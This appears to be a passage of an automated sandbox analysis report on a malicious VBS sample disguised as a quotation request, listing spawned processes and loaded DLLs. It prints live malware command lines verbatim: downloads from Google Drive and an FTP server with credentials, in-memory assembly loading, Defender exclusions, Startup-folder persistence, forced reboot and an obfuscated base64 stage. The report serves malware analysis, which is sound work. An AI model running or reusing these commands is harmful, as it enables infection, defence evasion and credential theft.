                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\wdxzjlwrwtnnhxspscqffyidgpjfmkcr"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ggckk"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\iaqclvrm"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\kevzykrtgrszbixbneqedqimjxlmbhz.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApACAAJw' + [char]Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\wdxzjlwrwtnnhxspscqffyidgpjfmkcr"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ggckk"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\iaqclvrm"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\kevzykrtgrszbixbneqedqimjxlmbhz.vbs"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
